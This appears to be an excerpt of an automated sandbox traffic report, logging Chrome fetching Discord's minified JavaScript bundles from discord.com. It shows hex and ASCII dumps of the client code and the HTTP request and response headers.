                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 6c 65 74 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 24 7d 2c 4d 65 73 73 61 67 65 46 6c 61 67 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 7d 2c 4d 65 73 73 61 67 65 41 74 74 61 63 68 6d 65 6e 74 46 6c 61 67 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 7d 2c 4d 65 73 73 61 67 65 45 6d 62 65 64 46 6c 61 67 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 59 7d 2c 4f 76 65 72 6c 61 79 44 69 73 70 6c 61 79 4e 61 6d 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 2c 4f 76 65 72 6c 61 79 44 69 73 70 6c 61 79 55 73 65 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 7d 2c 4f 76 65 72 6c 61 79 57 69 64 67 65 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                          Data Ascii: letable:function(){return I$},MessageFlags:function(){return g},MessageAttachmentFlags:function(){return h},MessageEmbedFlags:function(){return Y},OverlayDisplayNames:function(){return y},OverlayDisplayUsers:function(){return w},OverlayWidgets:function(){
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 4f 4e 53 5f 50 45 52 5f 46 45 54 43 48 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 52 7d 2c 4d 41 58 5f 4c 4f 41 44 45 44 5f 4d 45 53 53 41 47 45 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 61 7d 2c 54 52 55 4e 43 41 54 45 44 5f 4d 45 53 53 41 47 45 5f 56 49 45 57 5f 53 49 5a 45 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 49 7d 2c 4d 41 58 5f 4d 45 53 53 41 47 45 5f 43 41 43 48 45 5f 53 49 5a 45 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 65 7d 2c 4d 41 58 5f 4d 45 53 53 41 47 45 5f 4c 45 4e 47 54 48 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 41 7d 2c 4d 41 58 5f 4d 45 53 53 41 47 45 5f 4c 45 4e 47 54 48 5f 50 52 45 4d 49 55 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74
                                                                          Data Ascii: ONS_PER_FETCH:function(){return eR},MAX_LOADED_MESSAGES:function(){return ea},TRUNCATED_MESSAGE_VIEW_SIZE:function(){return eI},MAX_MESSAGE_CACHE_SIZE:function(){return ee},MAX_MESSAGE_LENGTH:function(){return eA},MAX_MESSAGE_LENGTH_PREMIUM:function(){ret
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 42 49 54 52 41 54 45 5f 4d 41 58 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 42 7d 2c 42 49 54 52 41 54 45 5f 53 54 45 50 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 66 7d 2c 4e 4f 4e 5f 55 53 45 52 5f 42 4f 54 5f 44 49 53 43 52 49 4d 49 4e 41 54 4f 52 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 48 7d 2c 4c 4f 43 41 4c 5f 42 4f 54 5f 49 44 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 67 7d 2c 4d 41 58 5f 56 4f 49 43 45 5f 55 53 45 52 5f 4c 49 4d 49 54 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 68 7d 2c 4d 41 58 5f 53 54 41 47 45 5f 56 4f 49 43 45 5f 55 53 45 52 5f 4c 49 4d 49 54 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 59 7d 2c 4d 41 58 5f 53 54 41 47 45 5f
                                                                          Data Ascii: BITRATE_MAX:function(){return eB},BITRATE_STEP:function(){return ef},NON_USER_BOT_DISCRIMINATOR:function(){return eH},LOCAL_BOT_ID:function(){return eg},MAX_VOICE_USER_LIMIT:function(){return eh},MAX_STAGE_VOICE_USER_LIMIT:function(){return eY},MAX_STAGE_
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 4e 7d 2c 41 6e 61 6c 79 74 69 63 73 47 61 6d 65 4f 70 65 6e 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 4f 7d 2c 41 6e 61 6c 79 74 69 63 73 55 73 65 72 53 74 61 74 75 73 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 69 7d 2c 41 6e 61 6c 79 74 69 63 73 50 61 67 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 4c 7d 2c 48 45 4c 50 5f 43 45 4e 54 45 52 5f 43 54 41 5f 41 4e 41 4c 59 54 49 43 53 5f 4e 41 4d 45 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 33 7d 2c 41 6e 61 6c 79 74 69 63 73 53 65 63 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 63 7d 2c 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 73 3a
                                                                          Data Ascii: on(){return _N},AnalyticsGameOpenTypes:function(){return _O},AnalyticsUserStatusTypes:function(){return _i},AnalyticsPages:function(){return _L},HELP_CENTER_CTA_ANALYTICS_NAME:function(){return e3},AnalyticsSections:function(){return _c},AnalyticsObjects:
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 41 54 45 5f 46 4f 52 4d 41 54 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 61 7d 2c 4e 45 57 5f 47 52 4f 55 50 5f 44 4d 5f 50 4f 50 4f 55 54 5f 49 44 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 49 7d 2c 42 6f 6f 73 74 65 64 47 75 69 6c 64 54 69 65 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 4b 7d 2c 41 70 70 6c 69 65 64 47 75 69 6c 64 42 6f 6f 73 74 73 52 65 71 75 69 72 65 64 46 6f 72 42 6f 6f 73 74 65 64 47 75 69 6c 64 54 69 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 65 7d 2c 47 55 49 4c 44 5f 42 4f 4f 53 54 5f 41 50 50 4c 59 5f 43 4f 4f 4c 44 4f 57 4e 5f 44 41 59 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 41 7d 2c 50 52 45 4d 49 55 4d 5f 54 59 50 45 5f 4e 4f
                                                                          Data Ascii: ATE_FORMAT:function(){return Aa},NEW_GROUP_DM_POPOUT_ID:function(){return AI},BoostedGuildTiers:function(){return _K},AppliedGuildBoostsRequiredForBoostedGuildTier:function(){return Ae},GUILD_BOOST_APPLY_COOLDOWN_DAYS:function(){return AA},PREMIUM_TYPE_NO
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 65 64 41 63 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 35 7d 2c 56 65 72 69 66 69 63 61 74 69 6f 6e 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 36 7d 2c 4d 41 58 5f 52 45 41 53 4f 4e 5f 4c 45 4e 47 54 48 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 6e 7d 2c 4d 6f 75 73 65 42 75 74 74 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 34 7d 2c 4b 65 79 62 6f 61 72 64 4b 65 79 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 38 7d 2c 50 69 63 74 75 72 65 49 6e 50 69 63 74 75 72 65 50 6f 73 69 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 37 7d 2c 50 69 63 74 75 72 65 49 6e 50 69 63 74 75 72 65 43 6f 6d 70 6f 6e 65 6e 74
                                                                          Data Ascii: edActions:function(){return _5},VerificationTypes:function(){return _6},MAX_REASON_LENGTH:function(){return An},MouseButtons:function(){return _4},KeyboardKeys:function(){return _8},PictureInPicturePositions:function(){return _7},PictureInPictureComponent
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 72 6e 20 45 6e 7d 2c 54 61 62 6c 65 53 6f 72 74 44 69 72 65 63 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 44 7d 2c 4f 70 65 72 61 74 69 6e 67 53 79 73 74 65 6d 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 53 7d 2c 45 6e 74 69 74 6c 65 6d 65 6e 74 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 43 7d 2c 43 6f 6e 74 65 6e 74 52 61 74 69 6e 67 41 67 65 6e 63 69 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 6c 7d 2c 53 4b 55 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 73 7d 2c 53 4b 55 41 63 63 65 73 73 54 79 70 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 50 7d 2c 53 4b 55 46 6c 61 67 73 3a 66 75 6e 63 74 69 6f
                                                                          Data Ascii: rn En},TableSortDirections:function(){return ED},OperatingSystems:function(){return ES},EntitlementTypes:function(){return EC},ContentRatingAgencies:function(){return El},SKUTypes:function(){return Es},SKUAccessTypes:function(){return EP},SKUFlags:functio


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          323192.168.2.550059162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:19 UTC866OUTGET /assets/65800.657a577c4f6fc39eb27e.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=SnUkM2Xw8Smv7qi2thG48IP2IGKF_yXwbqUJZsjCd1c-1702226718722-0-604800000
                                                                          2023-12-10 16:45:19 UTC1126INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 39 36 30 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 32 33 61 38 61 66 30 39 39 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:19 GMTContent-Type: application/javascriptContent-Length: 39602Connection: closeCF-Ray: 8336f523a8af099a-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 35 38 30 30 22 5d 2c 7b 39 31 36 35 38 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 2c 6e 28 22 32 32 32 30 30 37 22 29 3b 76 61 72 20 69 3d 6e 28 22 33 37 39 38 33 22 29 2c 61 3d 6e 28 22 38 38 34 36 39 31 22 29 2c 6c 3d 6e 28 22 34 34 36 36 37 34 22 29 2c 6f 3d 6e 28 22 36 30 30 39 36 35 22 29 2c 72 3d 6e 28 22 31 39 31 32 32 35 22 29 2c 73 3d 6e 28 22 34 32 30
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["65800"],{916580:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return y}}),n("222007");var i=n("37983"),a=n("884691"),l=n("446674"),o=n("600965"),r=n("191225"),s=n("420
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 65 28 29 3b 69 66 28 70 26 26 28 64 26 26 79 7c 7c 21 79 29 29 7b 6c 65 74 20 65 3d 75 2e 64 65 66 61 75 6c 74 2e 67 65 74 57 69 6e 64 6f 77 28 49 2e 50 6f 70 6f 75 74 57 69 6e 64 6f 77 4b 65 79 73 2e 43 48 41 4e 4e 45 4c 5f 43 41 4c 4c 5f 50 4f 50 4f 55 54 29 3b 45 3d 6e 75 6c 6c 3d 3d 65 3f 45 3a 7b 77 69 64 74 68 3a 65 2e 69 6e 6e 65 72 57 69 64 74 68 2c 68 65 69 67 68 74 3a 65 2e 69 6e 6e 65 72 48 65 69 67 68 74 7d 7d 21 64 26 26 79 3f 61 3d 49 2e 41 70 70 43 6f 6e 74 65 78 74 2e 41 50 50 3a 6f 26 26 28 61 3d 49 2e 41 70 70 43 6f 6e 74 65 78 74 2e 50 4f 50 4f 55 54 29 2c 6c 3d 64 26 26 43 3f 6e 75 6c 6c 3a 43 7c 7c 21 70 7c 7c 6f 3f 6e 75 6c 6c 21 3d 76 26 26 67 3d 3d 3d 53 2e 41 63 74 69 76 69 74 79 50 61 6e 65 6c 4d 6f 64 65 73 2e 50 41 4e 45 4c 26
                                                                          Data Ascii: e();if(p&&(d&&y||!y)){let e=u.default.getWindow(I.PopoutWindowKeys.CHANNEL_CALL_POPOUT);E=null==e?E:{width:e.innerWidth,height:e.innerHeight}}!d&&y?a=I.AppContext.APP:o&&(a=I.AppContext.POPOUT),l=d&&C?null:C||!p||o?null!=v&&g===S.ActivityPanelModes.PANEL&
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 29 7b 63 28 21 31 29 7d 72 65 74 75 72 6e 20 70 2e 73 75 62 73 63 72 69 62 65 28 64 2e 43 6f 6d 70 6f 6e 65 6e 74 41 63 74 69 6f 6e 73 2e 50 4f 50 4f 55 54 5f 53 48 4f 57 2c 65 29 2c 70 2e 73 75 62 73 63 72 69 62 65 28 64 2e 43 6f 6d 70 6f 6e 65 6e 74 41 63 74 69 6f 6e 73 2e 50 4f 50 4f 55 54 5f 48 49 44 45 2c 74 29 2c 28 29 3d 3e 7b 70 2e 75 6e 73 75 62 73 63 72 69 62 65 28 64 2e 43 6f 6d 70 6f 6e 65 6e 74 41 63 74 69 6f 6e 73 2e 50 4f 50 4f 55 54 5f 53 48 4f 57 2c 65 29 2c 70 2e 75 6e 73 75 62 73 63 72 69 62 65 28 64 2e 43 6f 6d 70 6f 6e 65 6e 74 41 63 74 69 6f 6e 73 2e 50 4f 50 4f 55 54 5f 48 49 44 45 2c 74 29 7d 7d 2c 5b 70 5d 29 2c 65 7c 7c 74 7c 7c 75 7c 7c 6e 7d 7d 2c 35 30 35 32 35 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65
                                                                          Data Ascii: ){c(!1)}return p.subscribe(d.ComponentActions.POPOUT_SHOW,e),p.subscribe(d.ComponentActions.POPOUT_HIDE,t),()=>{p.unsubscribe(d.ComponentActions.POPOUT_SHOW,e),p.unsubscribe(d.ComponentActions.POPOUT_HIDE,t)}},[p]),e||t||u||n}},505259:function(e,t,n){"use
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 6c 75 72 22 2c 65 29 2c 28 29 3d 3e 6e 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 6c 75 72 22 2c 65 29 3b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 70 26 26 28 68 2e 64 69 73 70 61 74 63 68 28 75 2e 43 6f 6d 70 6f 6e 65 6e 74 41 63 74 69 6f 6e 73 2e 50 4f 50 4f 55 54 5f 43 4c 4f 53 45 29 2c 64 2e 43 6f 6d 70 6f 6e 65 6e 74 44 69 73 70 61 74 63 68 2e 64 69 73 70 61 74 63 68 28 75 2e 43 6f 6d 70 6f 6e 65 6e 74 41 63 74 69 6f 6e 73 2e 43 4f 4e 54 45 58 54 5f 4d 45 4e 55 5f 43 4c 4f 53 45 29 29 7d 7d 2c 5b 6e 2c 70 2c 74 2c 68 5d 29 2c 69 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 76 61 72 20 69 2c 6c 2c 6f 3b 69 66 28 61 7c 7c 21 66 7c 7c 21 74 29 72 65 74 75 72 6e 3b 6c 65
                                                                          Data Ascii: addEventListener("blur",e),()=>n.removeEventListener("blur",e);function e(){p&&(h.dispatch(u.ComponentActions.POPOUT_CLOSE),d.ComponentDispatch.dispatch(u.ComponentActions.CONTEXT_MENU_CLOSE))}},[n,p,t,h]),i.useEffect(()=>{var i,l,o;if(a||!f||!t)return;le
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 43 7d 7d 29 2c 6e 28 22 32 32 32 30 30 37 22 29 2c 6e 28 22 33 31 33 36 31 39 22 29 2c 6e 28 22 36 35 34 37 31 34 22 29 2c 6e 28 22 32 38 37 31 36 38 22 29 2c 6e 28 22 39 35 36 36 36 30 22 29 3b 76 61 72 20 69 3d 6e 28 22 33 37 39 38 33 22 29 2c 61 3d 6e 28 22 38 38 34 36 39 31 22 29 2c 6c 3d 6e 28 22 34 31 34 34 35 36 22 29 2c 6f 3d 6e 2e 6e 28 6c 29 2c 72 3d 6e 28 22 38 34 31 30 37 36 22 29 2c 73 3d 6e 28 22 37 34 38 38 32 30 22 29 2c 64 3d 6e 28 22 34 34 36 36 37 34 22 29 2c 75 3d 6e 28 22 32 39 32 36 38 37 22 29 2c 63 3d 6e 28 22 36 31 34 38 31 38 22 29 2c 70 3d 6e 28 22 31 36 31 37 37 38 22 29 2c 66 3d 6e 28 22 36 35 39 35 30 30 22 29 2c 6d 3d 6e 28 22 31 35 37 39 34 35 22 29 2c 68 3d 6e 28 22 38 32 38 34 36 36 22 29 2c 76 3d 6e 28 22 39 35 34 30 31
                                                                          Data Ascii: C}}),n("222007"),n("313619"),n("654714"),n("287168"),n("956660");var i=n("37983"),a=n("884691"),l=n("414456"),o=n.n(l),r=n("841076"),s=n("748820"),d=n("446674"),u=n("292687"),c=n("614818"),p=n("161778"),f=n("659500"),m=n("157945"),h=n("828466"),v=n("95401
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 77 50 6f 70 75 70 73 3a 43 7d 29 2c 63 6c 61 73 73 4e 61 6d 65 3a 6e 2c 73 72 63 3a 22 22 2e 63 6f 6e 63 61 74 28 74 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 78 29 29 7d 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 6c 65 74 7b 6f 6e 4c 6f 61 64 3a 74 7d 3d 65 2c 5b 6e 2c 6c 5d 3d 61 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 72 3d 61 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 65 3d 3e 7b 6c 28 21 30 29 2c 6e 75 6c 6c 3d 3d 74 7c 7c 74 28 65 29 7d 2c 5b 74 5d 29 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 49 2e 66 69 6c 6c 50 61 72 65 6e 74 2c 63 68 69 6c 64 72 65 6e 3a 5b 21 6e 26 26 28 30 2c 69 2e 6a 73 78 29 28 22 64 69 76
                                                                          Data Ascii: wPopups:C}),className:n,src:"".concat(t,"?").concat(new URLSearchParams(x))}):null}function C(e){let{onLoad:t}=e,[n,l]=a.useState(!1),r=a.useCallback(e=>{l(!0),null==t||t(e)},[t]);return(0,i.jsxs)("div",{className:I.fillParent,children:[!n&&(0,i.jsx)("div
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 69 6e 64 6f 77 3b 72 65 74 75 72 6e 7b 64 6f 63 6b 65 64 52 65 63 74 3a 6e 75 6c 6c 21 3d 65 3f 49 2e 64 65 66 61 75 6c 74 2e 67 65 74 44 6f 63 6b 65 64 52 65 63 74 28 65 2e 69 64 29 3a 6e 75 6c 6c 2c 69 73 48 69 64 64 65 6e 3a 49 2e 64 65 66 61 75 6c 74 2e 69 73 45 6d 62 65 64 64 65 64 41 63 74 69 76 69 74 79 48 69 64 64 65 6e 28 29 7d 7d 29 2c 55 3d 28 30 2c 72 2e 75 73 65 53 74 61 74 65 46 72 6f 6d 53 74 6f 72 65 73 29 28 5b 6d 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 6d 2e 64 65 66 61 75 6c 74 2e 67 65 74 57 69 6e 64 6f 77 28 4d 2e 50 6f 70 6f 75 74 57 69 6e 64 6f 77 4b 65 79 73 2e 43 48 41 4e 4e 45 4c 5f 43 41 4c 4c 5f 50 4f 50 4f 55 54 29 29 2c 7b 61 63 74 69 76 69 74 79 50 61 72 74 69 63 69 70 61 6e 74 3a 6b 2c 73 65 6c 65 63 74 65 64 50 61 72 74
                                                                          Data Ascii: indow;return{dockedRect:null!=e?I.default.getDockedRect(e.id):null,isHidden:I.default.isEmbeddedActivityHidden()}}),U=(0,r.useStateFromStores)([m.default],()=>m.default.getWindow(M.PopoutWindowKeys.CHANNEL_CALL_POPOUT)),{activityParticipant:k,selectedPart
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 74 69 6f 6e 73 2e 76 61 6c 75 65 73 28 29 29 2e 6d 61 70 28 65 3d 3e 43 2e 64 65 66 61 75 6c 74 2e 67 65 74 55 73 65 72 28 65 2e 75 73 65 72 5f 69 64 29 29 2e 66 69 6c 74 65 72 28 65 3d 3e 6e 75 6c 6c 21 3d 65 29 2c 51 3d 7b 69 6e 73 74 61 6e 63 65 5f 69 64 3a 44 2c 63 68 61 6e 6e 65 6c 5f 69 64 3a 74 2e 69 64 7d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 2e 67 75 69 6c 64 5f 69 64 26 26 22 22 21 3d 3d 74 2e 67 75 69 6c 64 5f 69 64 26 26 28 51 2e 67 75 69 6c 64 5f 69 64 3d 74 2e 67 75 69 6c 64 5f 69 64 29 2c 28 30 2c 69 2e 6a 73 78 29 28 50 2e 64 65 66 61 75 6c 74 2c 7b 74 69 6d 65 6f 75 74 3a 32 65 33 2c 63 68 69 6c 64 72 65 6e 3a 65 3d 3e 7b 76 61 72 20 61 2c 72 2c 64 2c 75 2c 63 2c 70 2c 66 2c 6d 3b 6c 65 74 7b 69 64 6c 65 3a 68 2c 6f 6e 41 63 74 69
                                                                          Data Ascii: tions.values()).map(e=>C.default.getUser(e.user_id)).filter(e=>null!=e),Q={instance_id:D,channel_id:t.id};return null!=t.guild_id&&""!==t.guild_id&&(Q.guild_id=t.guild_id),(0,i.jsx)(P.default,{timeout:2e3,children:e=>{var a,r,d,u,c,p,f,m;let{idle:h,onActi
                                                                          2023-12-10 16:45:19 UTC1369INData Raw: 61 6e 6e 65 6c 3a 74 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 62 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 2c 73 65 6c 65 63 74 65 64 50 61 72 74 69 63 69 70 61 6e 74 3a 6b 7d 29 5d 7d 29 3a 6e 75 6c 6c 29 2c 6e 3f 28 30 2c 69 2e 6a 73 78 29 28 73 2e 53 70 69 6e 6e 65 72 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6f 28 4c 2e 69 66 72 61 6d 65 2c 7b 5b 4c 2e 70 69 70 4d 6f 64 65 53 68 6f 72 74 5d 3a 7a 26 26 21 6c 2c 5b 4c 2e 70 69 70 4d 6f 64 65 54 61 6c 6c 5d 3a 7a 26 26 6c 7d 29 7d 29 3a 28 30 2c 69 2e 6a 73 78 29 28 54 2e 45 6d 62 65 64 49 46 72 61 6d 65 57 69 74 68 4c 6f 61 64 69 6e 67 42 61 63 6b 67 72 6f 75 6e 64 2c 7b 61 6c 6c 6f 77 50 6f 70 75 70 73 3a 4e 2e 41 50 50 4c 49 43 41 54 49 4f 4e 53 5f 57 49 54 48 5f 41 4c 4c 4f 57 45 44 5f 50 4f 50 55
                                                                          Data Ascii: annel:t,applicationId:b.application_id,selectedParticipant:k})]}):null),n?(0,i.jsx)(s.Spinner,{className:o(L.iframe,{[L.pipModeShort]:z&&!l,[L.pipModeTall]:z&&l})}):(0,i.jsx)(T.EmbedIFrameWithLoadingBackground,{allowPopups:N.APPLICATIONS_WITH_ALLOWED_POPU


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          324192.168.2.550060162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:19 UTC866OUTGET /assets/66318.3e13ea80eda74e3ed337.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=SnUkM2Xw8Smv7qi2thG48IP2IGKF_yXwbqUJZsjCd1c-1702226718722-0-604800000
